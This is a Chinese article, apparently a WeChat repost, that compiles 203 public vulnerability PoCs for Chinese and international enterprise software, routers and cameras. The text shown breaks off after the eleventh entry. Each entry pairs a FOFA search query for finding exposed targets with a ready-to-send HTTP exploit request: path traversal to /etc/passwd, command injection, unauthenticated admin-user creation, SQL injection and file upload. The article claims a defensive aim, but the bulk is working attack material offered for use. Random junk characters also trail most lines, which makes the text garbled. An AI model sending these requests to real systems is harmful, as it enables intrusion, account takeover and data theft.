互联网公开漏洞整理202309-202406
/ z" L' O0 E8 P5 u/ Q! q+ k道一安全 2024-06-05 07:41 北京, a% H k9 Z' `' h. | D- X
以下文章来源于网络安全新视界 ,作者网络安全新视界3 [, s% S+ h( k$ \/ q2 |
# ~1 y E( w% ^2 w+ G' q6 a* ]2 c发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
* C3 n* H0 k- W/ X3 B# u( F" T- Z) L2 P8 r
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。, `- ^6 ^4 W* p! h
+ c& ?9 _- l7 h$ f4 ]2 j
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
* u, b' I( U1 q7 k
: H/ y7 k% D: y% b% @6 |文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
]9 Y7 D6 Q. l2 n; i$ ^, M2 w* g* T- \
/ e3 r' h" g/ h0 V% \1 t合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。" E! U$ K7 ]3 b( ]2 X, K
; U" Y0 p z. V) H# t
; P" _ j5 `$ f- c
声明
# \& Y4 c1 I; c# D; j
8 w% v- c. k" ^# s l. B为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。+ O* p. g# i ^9 p8 T% n
- N$ c4 }4 U a+ r! [
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。! c; V1 D$ R+ Q. a
" i. X) s1 D# y0 s4 ?) \- N( k
$ G, d9 ~! c& j5 t5 r1 T2 E; v
* V; f/ n& x$ }. A" j n2 U目录
% O5 Q3 N8 K! p& _
' K0 N- l1 z; D9 |/ S01
4 `6 D' i {; _) w1 w7 G& `. E3 [! R+ M% O2 N
1. StarRocks MPP数据库未授权访问% g3 L2 v3 U- }
2. Casdoor系统static任意文件读取+ R/ z/ P) h6 A, S
3. EasyCVR智能边缘网关 userlist 信息泄漏
4 f2 j# H4 n5 n4. EasyCVR视频管理平台存在任意用户添加4 _$ x9 `5 n9 w# a1 n
5. NUUO NVR 视频存储管理设备远程命令执行
2 l, I0 O6 {8 e5 y. q! V" y6. 深信服 NGAF 任意文件读取
$ q& ~) \& [2 I7 N0 W7. 鸿运主动安全监控云平台任意文件下载) D" c" z* a* K: [) y. C
8. 斐讯 Phicomm 路由器RCE
( @% ?, j4 F0 M& S) _" C9. 稻壳CMS keyword 未授权SQL注入
2 ]) V" |2 Q4 L10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ v+ S! E; I$ Z9 F6 @1 J
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入+ z6 w- V$ p, y# g, S, h
12. Jorani < 1.0.2 远程命令执行
7 v7 I" a6 }5 f- p0 K, x' R' C13. 红帆iOffice ioFileDown任意文件读取0 _) p: q5 x& |) U
14. 华夏ERP(jshERP)敏感信息泄露( ]" y& E6 A1 G& |7 w$ O Y
15. 华夏ERP getAllList信息泄露
* O9 [2 r% G$ u! t/ }' \16. 红帆HFOffice医微云SQL注入
. W9 W0 z- z1 n" S) `17. 大华 DSS itcBulletin SQL 注入
) A9 g$ N+ `) `6 h, g18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 j, {" {( L n/ i
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
2 d x6 \2 B& s8 @7 g, I$ l/ T20. 大华ICC智能物联综合管理平台任意文件读取! y; a* j# U* {( o" \) k
21. 大华ICC智能物联综合管理平台random远程代码执行
3 K j5 e# z w$ _! M6 a22. 大华ICC智能物联综合管理平台 log4j远程代码执行
~5 R# l% P5 e0 H q23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 z7 `/ u5 ~& s& e
24. 用友NC 6.5 accept.jsp任意文件上传
6 v* i8 |( z" g7 f& J6 W, t1 F! N3 D25. 用友NC registerServlet JNDI 远程代码执行2 K [# u( a0 X( x
26. 用友NC linkVoucher SQL注入1 K) l; Q0 u+ F# i3 r$ U; N2 P" k$ r
27. 用友 NC showcontent SQL注入% o7 K7 |2 W D9 \
28. 用友NC grouptemplet 任意文件上传+ ?+ l; \/ {- v$ F
29. 用友NC down/bill SQL注入. ]- X/ f8 P4 {) [
30. 用友NC importPml SQL注入3 U: j4 J( V: t- I& d. c4 ~
31. 用友NC runStateServlet SQL注入, P6 x0 V. h, Y: z7 s! H( W/ L/ H+ }
32. 用友NC complainbilldetail SQL注入; g% U O) M- O+ T, M
33. 用友NC downTax/download SQL注入+ J+ r6 _% O) ]' ]# f) d1 f
34. 用友NC warningDetailInfo接口SQL注入' u# R$ f7 x/ x3 \& _
35. 用友NC-Cloud importhttpscer任意文件上传
7 C. \* r# c% |& }36. 用友NC-Cloud soapFormat XXE0 l4 X. P! |( c: c8 p
37. 用友NC-Cloud IUpdateService XXE
- ?/ B& n) f8 h) b. ]3 h38. 用友U8 Cloud smartweb2.RPC.d XXE# ^/ _& I: N- ]0 I
39. 用友U8 Cloud RegisterServlet SQL注入
# Y1 u! x* S: N$ Y; v40. 用友U8-Cloud XChangeServlet XXE
3 S* L5 |8 C9 g6 C41. 用友U8 Cloud MeasureQueryByToolAction SQL注入/ U/ q( W" b+ v4 ^- A* z
42. 用友GRP-U8 SmartUpload01 文件上传* q. y9 j* X' N
43. 用友GRP-U8 userInfoWeb SQL注入致RCE% C# D) ]8 l* ]7 G+ F/ z, t
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
8 K9 I0 K+ N' j; L; \45. 用友GRP-U8 ufgovbank XXE1 j7 ~# i; F+ U y$ m, ?' n3 l
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. N7 Z0 t0 ]' w" h47. 用友GRP A++Cloud 政府财务云 任意文件读取! \4 J0 \ D( u4 l, p
48. 用友U8 CRM swfupload 任意文件上传
$ P4 { F* i7 L+ R9 y4 R2 h0 H) U: K$ l49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 Y- W2 f" t! `# E9 d* G
50. QDocs Smart School 6.4.1 filterRecords SQL注入
- X% \) f" q% k1 y) Q9 ]! w51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入3 S) W9 K& A0 F5 j9 S' a) k/ C
52. 泛微E-Office json_common.php sql注入
" r2 n: ^% r- ]- _$ z! g53. 迪普 DPTech VPN Service 任意文件上传! O+ X% t8 N6 s
54. 畅捷通T+ getstorewarehousebystore 远程代码执行7 b3 v6 Y3 `. T
55. 畅捷通T+ getdecallusers信息泄露- g, u j2 E. J0 i" f
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, L& Z5 W# j4 S S Q2 o57. 畅捷通T+ keyEdit.aspx SQL注入
) O- v z( \4 L3 z4 B/ l58. 畅捷通T+ KeyInfoList.aspx sql注入
`( f5 Y- O# l; g# }4 i" c59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
$ \5 \9 K7 _# W60. 百卓Smart管理平台 importexport.php SQL注入
- o, Y' c8 ^0 K61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
$ ]5 U+ j6 h# H+ J. z62. IP-guard WebServer 远程命令执行
# D+ v+ b8 e( M% U) V6 _63. IP-guard WebServer任意文件读取
& Z8 j: w+ A: @8 y9 G9 e64. 捷诚管理信息系统CWSFinanceCommon SQL注入
/ i$ Q. @* h9 V& C65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' i$ W4 ?9 r, W5 p' y( w7 n" E
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入& z- G4 F7 {; H. W8 J' [/ A: z/ S* I0 |" \
67. 万户ezOFFICE wpsservlet任意文件上传
$ @. L0 H3 H' C$ f68. 万户ezOFFICE wf_printnum.jsp SQL注入
. o' R8 q8 x1 C/ p: T69. 万户 ezOFFICE contract_gd.jsp SQL注入
! w$ ]! ?4 `" l/ c+ ?5 I70. 万户ezEIP success 命令执行$ @/ o9 j. r- u; N
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 t F2 I3 ^) _+ b; `72. 致远OA getAjaxDataServlet XXE
" |/ I6 ~- L, E! P73. GeoServer wms远程代码执行
' K" A; t7 ^" J1 ~( V4 z5 c; X74. 致远M3-server 6_1sp1 反序列化RCE
! F2 A+ u% s* a1 I% E75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
% b( S5 j0 k( p( u76. 新开普掌上校园服务管理平台service.action远程命令执行& x3 C+ s8 ^( c0 ?3 B
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! |/ F! o- E4 L% J78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传2 B5 C- g' U, |( }0 _
79. BYTEVALUE 百为流控路由器远程命令执行8 U8 G x4 O: {7 D) R
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
+ f( A& y4 i2 R81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
( F3 S% I7 W8 L6 q6 C P82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 _ E: i4 _4 k" P# f+ o
83. JeecgBoot testConnection 远程命令执行2 [- x* y/ e) r: s4 Q; W% r
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入* p5 K m3 `$ z; p
85. SysAid On-premise< 23.3.36远程代码执行
9 Z6 G( A' U9 d8 v# }86. 日本tosei自助洗衣机RCE
6 b! l/ {% a6 i# [: |. g* U8 ^87. 安恒明御安全网关aaa_local_web_preview文件上传
; K5 ?- H: o8 B/ x# T, l' C88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行: G4 ~% [( e) ^& r6 R
89. 致远互联FE协作办公平台editflow_manager存在sql注入9 V* B) v! ?7 A, N
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
. p5 l; D& f% y: r; S91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取! B+ \) n( N0 O4 t0 G$ F0 s% O
92. 海康威视运行管理中心session命令执行+ E5 {' ^9 b( @# B
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传2 g5 l. F9 K# g% u; N$ O
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传; [; v- M8 f* y1 x
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
+ [4 Y# N' y, H5 @4 `: J: Z96. Apache OFBiz 18.12.11 groovy 远程代码执行
: j$ G# M2 [+ M0 S- T) C97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
) q M& D4 {3 j8 B' J! T98. SpiderFlow爬虫平台远程命令执行
( ^/ e! V/ E: C$ O9 p99. Ncast盈可视高清智能录播系统busiFacade RCE9 j* d+ L) t' f! T8 |# Q
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传 O7 f0 c; x) L- x5 x: a4 h4 V
101. ivanti policy secure-22.6命令注入% z$ n: b% v) N; H) R+ j! Y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 P6 |. `/ B& S8 Y* g103. Ivanti Pulse Connect Secure VPN XXE, N. b$ f$ F0 W7 b% O
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露& V- z4 p$ w* T
105. SpringBlade v3.2.0 export-user SQL 注入
3 r" h1 z% r' D, P% q+ I* D% n/ E106. SpringBlade dict-biz/list SQL 注入
* m# _, Y( g- p3 R107. SpringBlade tenant/list SQL 注入8 M* c E( [5 P1 g7 k5 g
108. D-Tale 3.9.0 SSRF S1 Y3 H+ ^9 C/ D3 H
109. Jenkins CLI 任意文件读取
& f4 F: Q3 x, v1 M110. Goanywhere MFT 未授权创建管理员& u6 W1 c9 {4 A0 R
111. WordPress Plugin HTML5 Video Player SQL注入" C4 `9 [0 m+ E4 P/ O6 |( W
112. WordPress Plugin NotificationX SQL 注入9 J1 c& A( \9 H @; t/ `+ h/ y2 R/ O
113. WordPress Automatic 插件任意文件下载和SSRF
3 G2 i) G4 e1 `: l114. WordPress MasterStudy LMS插件 SQL注入
. |; Y% x4 |! p' W115. WordPress Bricks Builder <= 1.9.6 RCE
, w% X' Z( _2 G116. wordpress js-support-ticket文件上传
: i6 i' @) h2 c, ]4 Z4 d+ V117. WordPress LayerSlider插件SQL注入
- K, f4 q* t* {118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
1 d4 p" w) w* H. `( n7 L* K119. 北京百绰智能S20后台sysmanageajax.php sql注入; p; P: ~7 L- m
120. 北京百绰智能S40管理平台导入web.php任意文件上传
. ?8 u1 [0 d+ q. l# x( t121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 H8 B( b/ [* ?: l$ T. u3 W122. 北京百绰智能s200管理平台/importexport.php sql注入
1 t, s/ f8 X6 A9 F+ E123. Atlassian Confluence 模板注入代码执行+ `9 H3 N# o4 U8 o5 \
124. 湖南建研工程质量检测系统任意文件上传
* y9 o& R- l; `* l8 U7 O6 b125. ConnectWise ScreenConnect身份验证绕过, ?) Z7 W, ^- `% R7 D$ r! n2 [
126. Aiohttp 路径遍历" V& \, ^0 U D; U+ a& U
127. 广联达Linkworks DataExchange.ashx XXE9 x J; m% |5 D+ e6 z8 V0 R
128. Adobe ColdFusion 反序列化
5 Q" g8 ~& O. n3 g4 w! [129. Adobe ColdFusion 任意文件读取
5 `3 W9 m# X; `1 v, s$ H130. Laykefu客服系统任意文件上传. n" J6 ?7 H& t7 {
131. Mini-Tmall <=20231017 SQL注入
& V5 |( L# S/ t9 x: j132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; h7 _. U' P- ^( F, Y
133. H5 云商城 file.php 文件上传! P y: a: i3 Q! Z H( @: G, M7 C
134. 网康NS-ASG应用安全网关index.php sql注入
3 Z4 T: Z: d: D% U( _2 x: Q. o# m- m135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
+ S1 g' F/ u3 Z$ l2 @5 y% r136. NextChat cors SSRF
: n7 c- X9 N0 e' } j. |137. 福建科立迅通信指挥调度平台down_file.php sql注入
( e; L' z3 i! J" i6 t8 k* Z: c# d138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
; \- ^' t5 h9 d139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 S) r4 ]1 V: [* Q1 c
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入: `5 v& `# n0 L
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
+ B) o! o& T' a. o142. CMSV6车辆监控平台系统中存在弱密码( a( U/ ~' p1 C5 ]
143. Netis WF2780 v2.1.40144 远程命令执行
; x4 g3 t( ^; P" i: L144. D-Link nas_sharing.cgi 命令注入
) I. q" q) g8 B* d5 D145. Palo Alto Networks PAN-OS GlobalProtect 命令注入9 N4 g* n0 @3 ~9 e
146. MajorDoMo thumb.php 未授权远程代码执行: ^0 Z, }) g8 }$ X% k
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
7 {) c# i: M4 S" A3 h s148. CrushFTP 认证绕过模板注入" H; N! ~% Y) k$ o
149. AJ-Report开源数据大屏存在远程命令执行+ P7 {; ]% S1 i1 t
150. AJ-Report 1.4.0 认证绕过与远程代码执行0 Z L9 E6 m* T0 c
151. AJ-Report 1.4.1 pageList sql注入7 q4 [4 M; ?% t' ]. J( _8 W
152. Progress Kemp LoadMaster 远程命令执行9 w- v# o3 G; Z
153. gradio任意文件读取
5 |$ k! n) d2 C6 A y154. 天维尔消防救援作战调度平台 SQL注入
+ p9 D' ]8 D. w. |3 ^8 Y) f# L155. 六零导航页 file.php 任意文件上传; j6 ^3 ^3 k% \0 y' R
156. TBK DVR-4104/DVR-4216 操作系统命令注入, Y/ {9 H* g9 L
157. 美特CRM upload.jsp 任意文件上传
7 a/ ~( E% h# m, P# @' t+ `158. Mura-CMS-processAsyncObject存在SQL注入$ h/ k4 w9 Y! C! L' L o
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
6 G* C2 E; v8 Q. Z: m& W160. Sonatype Nexus Repository 3目录遍历与文件读取% ~5 z4 c# O5 a1 a2 {
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传3 r& P* `* n. h- B6 Z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传6 T7 Q2 n1 a# H$ Z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传* Q6 c: W1 Q3 F+ \
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
4 \- G/ w6 H0 E0 k165. OrangeHRM 3.3.3 SQL 注入
/ k+ i9 @3 J- R+ M166. 中成科信票务管理平台SeatMapHandler SQL注入% n+ B! `; u2 [4 |: b9 ~$ M' _
167. 精益价值管理系统 DownLoad.aspx任意文件读取
* Z6 D, ] b7 B8 i u) I. B2 @168. 宏景EHR OutputCode 任意文件读取
; z2 I8 `- o7 i% L6 d169. 宏景EHR downlawbase SQL注入
" e0 Y; {, R, \170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* \7 @" F% h" \3 J0 P171. 通天星CMSV6车载定位监控平台 SQL注入
! v6 j4 \" w% k& M1 T& d' `* k- Q4 S172. DT-高清车牌识别摄像机任意文件读取. w. ]) K1 Q- p% X9 J3 S
173. Check Point 安全网关任意文件读取
# d9 f+ p* u! B# Q, H" Z* Y/ H2 H174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 N% {& S; S: M# R! f175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入# t# E1 O. w9 o& F, d1 z' a
176. 电信网关配置管理系统 rewrite.php 文件上传
6 e0 p" c( w2 ?' F! k2 {! ]8 Q177. H3C路由器敏感信息泄露
4 |' n4 |5 F1 c& x2 O$ D+ P4 W, R* x178. H3C校园网自助服务系统-flexfileupload-任意文件上传, x3 u6 Z/ b4 k4 n" {3 o
179. 建文工程管理系统存在任意文件读取. I2 ^) l0 J0 i6 y
180. 帮管客 CRM jiliyu SQL注入
1 h! \$ f9 u- i0 @8 d8 Q181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; u! t9 N5 K( t
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建; n' w* ^: N* }3 x8 V7 w; A' t
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: C0 K2 r* {8 Q. k! z
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加! I9 e& j t2 V) L* O8 I; n, [ t
185. 瑞友天翼应用虚拟化系统SQL注入1 K# n0 o# t e s5 i
186. F-logic DataCube3 SQL注入- [) y) P; J1 z' Q' e# \" G) L
187. Mura CMS processAsyncObject SQL注入
( `- I1 n7 \9 F$ Y9 |3 D188. 叁体-佳会视频会议 attachment 任意文件读取
# w8 N. Z/ h9 a+ J189. 蓝网科技临床浏览系统 deleteStudy SQL注入7 y7 |: A1 q% ^# q2 D" ?
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
; |5 X8 O! ]. f$ g, c* H, c2 I191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
* ?* ^# d5 Z, g192. 富通天下外贸ERP UploadEmailAttr 任意文件上传3 w W' Y9 U: o: N' v X9 R
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 h+ A) p6 t: H/ c5 ^* K" i194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
' J7 Z% `6 b9 a195. 飞鱼星上网行为管理系统 send_order.cgi命令执行3 y9 Y- l) j# E1 m
196. 河南省风速科技统一认证平台密码重置
4 o# Z" V7 v" \ u+ `, k4 p197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入5 J# o# T( e5 L3 L6 g) l
198. 阿里云盘 WebDAV 命令注入: C) h0 q \6 K
199. cockpit系统assetsmanager_upload接口 文件上传3 {/ p$ O5 W/ ^2 K/ J" ]
200. SeaCMS海洋影视管理系统dmku SQL注入
- z3 \' b) l3 @$ ^# r9 s& a201. 方正全媒体新闻采编系统 binary SQL注入
& X9 r: d* h1 a* P& `+ ^202. 微擎系统 AccountEdit任意文件上传
. Y8 f( P8 {1 C, l/ f203. 红海云EHR PtFjk 文件上传
3 u5 w0 G$ i6 @4 G& y& K$ D* R3 P1 K4 W% }- A0 L
POC列表2 w1 r& O4 {1 g g! U1 |
" u. K3 H8 M1 o: s5 v
02/ b+ x- N7 T, R) G& R5 v
- c4 I# Y3 n, [1. StarRocks MPP数据库未授权访问1 d; X2 X. a/ K1 Y
FOFA :title="StarRocks"" ]4 s+ A0 W; A6 g
GET /mem_tracker HTTP/1.15 Y w, O7 }0 G- p4 m6 D) A' X4 d
Host: URL; U9 f$ O' C& a
. `7 _1 l) T# T' v8 w& B6 h" v" a6 O& H# |
6 Z9 ~5 |& p# L
2. Casdoor系统static任意文件读取
0 K) R. s: g% F7 gFOFA :title="Casdoor"
! g8 a9 k1 r, U; p4 Y* I3 j& O3 lGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
0 n1 a: T- J# \- @/ k/ ]: NHost: xx.xx.xx.xx:9999
1 }# b1 x2 O( M' {: R) WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 E% A0 O) s( g* YConnection: close8 B3 p4 F `6 K3 J) q7 E, V
Accept: */* s1 ?5 G1 D8 f; l$ F
Accept-Language: en
& U' a) T4 ]% `; Z9 tAccept-Encoding: gzip, v! w$ G3 R4 N) O; I3 L
8 [' [) i5 k0 ^! I7 Q. s h0 e
0 v' D% r/ }4 c( V3. EasyCVR智能边缘网关 userlist 信息泄漏% Q; v$ Z1 |$ Y, `: I3 S9 D
FOFA :title="EasyCVR"9 @2 M/ {" \2 y7 @* j5 L' }
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
s* M! R1 [" _Host: xx.xx.xx.xx+ h, ^6 g% P7 G+ c
' p# n5 e3 G& T5 Y' a$ l$ U7 i' C. h$ O0 m0 X h: X# C" ~* w- z
4. EasyCVR视频管理平台存在任意用户添加1 F- g: _5 f3 p. D3 O
FOFA :title="EasyCVR"3 }) t9 T$ ~" K) [3 {' N
* e4 B/ }8 R7 H/ W$ wpassword更改为自己的密码md5
# s( R" d0 F" [: W% \# h+ b& CPOST /api/v1/adduser HTTP/1.13 M6 d1 O% S# [: Q6 `& V! W& u
Host: your-ip9 _) k5 F7 B, G; P' e5 i; m7 A# H9 d
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 @4 [ v$ b! N. f% J7 z& I# b
, f: R4 E a" Kname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
* I" e: c+ O9 q, c* a6 o8 q7 E1 J3 y- i6 }3 T. E' @: x5 j( g
' `+ a% a$ E# D6 k
5. NUUO NVR 视频存储管理设备远程命令执行
4 ]9 |$ S4 R+ H' |' y- [FOFA:title="Network Video Recorder Login"
' @- v+ _* U* w! c( a, J# JGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
/ Z$ w, |# L' n$ N3 z( OHost: xx.xx.xx.xx/ R( }5 S" {, K
( i6 P9 t! n8 c N$ o: W6 K' A
. B# m0 r b7 _, @0 F9 k* P0 [5 D" c6. 深信服 NGAF 任意文件读取
3 Q8 e9 X" @' [9 f( q4 OFOFA:title="SANGFOR | NGAF"
) l* e6 L7 f$ sGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1& \' a9 y( x- [8 B$ U) t* w3 ~' F
Host:
- W4 ?# a3 t5 }9 q
2 L. T% B( e) L l
& r) h, Y0 O( u& f- Q. @7. 鸿运主动安全监控云平台任意文件下载
6 e* s' X+ I8 O$ YFOFA:body="./open/webApi.html"
9 k6 k$ U. d8 h( k a! JGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1; ~' s" A6 S* l2 q
Host:) l3 H/ h' x6 D) [% ?7 s0 u
1 x( U2 C7 h, M- R1 U+ a# D3 D) n4 U; G, r
8. 斐讯 Phicomm 路由器RCE
- ^" G! w0 H- S6 b# KFOFA:icon_hash="-1344736688"5 c6 r1 F/ Z9 Z9 M
默认账号admin登录后台后,执行操作
9 K, t% `) o3 U% Z' Y" yPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
0 r: h' j' t% Q. lHost: x.x.x.x" M# |7 s5 h# v% I2 B0 y
Cookie: sysauth=第一步登录获取的cookie! N9 w) q6 F1 `4 p% k3 J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
- Z' B+ U" ?) }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
! a8 w4 K4 i$ j' x6 _! a# c; C$ C$ s& p& o6 A
------WebKitFormBoundaryxbgjoytz
7 w* N) |5 u3 dContent-Disposition: form-data; name="wifiRebootEnablestatus", X" }+ T9 L3 q" G; I: {/ E6 e
( J7 \! V' V& Q%s
1 _, H9 h- x% d7 l B4 |------WebKitFormBoundaryxbgjoytz4 h) T( Q1 q ]# A' i" Z2 q- X
Content-Disposition: form-data; name="wifiRebootrange": a: K) W4 V* C2 T# E9 W+ w
5 }8 x, Y7 S, }: W; d12:00; id;) E4 b! D: R+ d+ ^+ e2 C1 r% y
------WebKitFormBoundaryxbgjoytz; b+ k2 c" y3 |. F' I( t
Content-Disposition: form-data; name="wifiRebootendrange"' A0 h4 i2 y! d/ L, Q0 g3 v- O+ u
9 S: ?6 a$ I/ n% [' u1 Y( b%s:
J0 R8 G! _# ?3 x* R3 A4 `- e------WebKitFormBoundaryxbgjoytz2 j% d- E2 n2 b! D6 o( V
Content-Disposition: form-data; name="cururl2"
2 @! V8 w( x4 }+ H9 \" C `6 X# ` E- w8 K2 X
% c3 Z2 w6 ?9 y" l3 b: H
------WebKitFormBoundaryxbgjoytz--. d& [0 B7 F, Y& |9 ~3 p
1 |% h' B4 w1 X; k. K6 n5 J6 u
( f/ d; e0 c+ x' w9 P- q |
9. 稻壳CMS keyword 未授权SQL注入6 d% P. w0 l5 x7 B, O
FOFA:app="Doccms"; L! ^& z/ _7 A7 Q
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
8 E. [8 _# k# H: i9 H, W$ i2 wHost: x.x.x.x& i5 @' U; S1 d
j5 K. T0 n' z6 H2 m) \
( S2 m. H( q! ]1 ]payload为下列语句的二次Url编码6 F2 w9 r/ K% A' v& W
% c d# D3 p/ B2 r: ~! f
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#$ C4 I7 J$ R* t% q) @; ?
, v+ n) r& z7 z v. s3 j10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% [) b) B& L( x& v! F) ~" _# i) _4 ]FOFA:icon_hash="953405444"
/ [5 t) n$ w/ Y: j: i/ Z/ H" `6 g8 S
文件上传后响应中包含上传文件的路径/ \5 s' ~# |0 o. X0 |+ \- F& t% g
POST /eis/service/api.aspx?action=saveImg HTTP/1.10 y2 [; B; X% |
Host: x.x.x.x:xx
6 H, d, w" O6 h; ] _2 J5 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36# |; R2 | W/ C$ e0 }
Content-Length: 197
2 A& t7 t! E5 J2 o4 x3 O5 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 c* v+ G# j+ mAccept-Encoding: gzip, deflate
# m n) C. `% y1 DAccept-Language: zh-CN,zh;q=0.9* ]& L* p' p) J
Connection: close9 g k# ]. V6 ?- ^& U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu/ o9 g7 ~, j9 x& H
% [( r; s+ T% } g& j1 b2 h8 J
------WebKitFormBoundaryxdgaqmqu
' b" m% x. y. L$ aContent-Disposition: form-data; name="file"filename="icfitnya.txt", ^% a+ P, E6 } i% O1 I
Content-Type: text/html
) k4 x, I* h9 @5 y# o
# d. M# x' w" n4 r2 K3 T. sjmnqjfdsupxgfidopeixbgsxbf
6 Z R+ A$ y) a$ I0 K------WebKitFormBoundaryxdgaqmqu--
$ ~. w+ L# M: @2 `' N( W0 ]/ ]
0 v, ]4 @( q) A- n* N1 b
% M8 H4 e' {- e) p; d9 ~( A( `11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
. t& b1 ]! C5 B2 o: M: m7 GFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
8 ?' o9 D& L, X) r4 m# n1 D: F. X1 jGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
# B' ~/ U6 I5 f/ l; l4 BHost: 127.0.0.1
2 \' w9 r2 z! h6 ~, D# p w7 T+ T1 _Pragma: no-cache( V" c2 U, s) n+ [; l
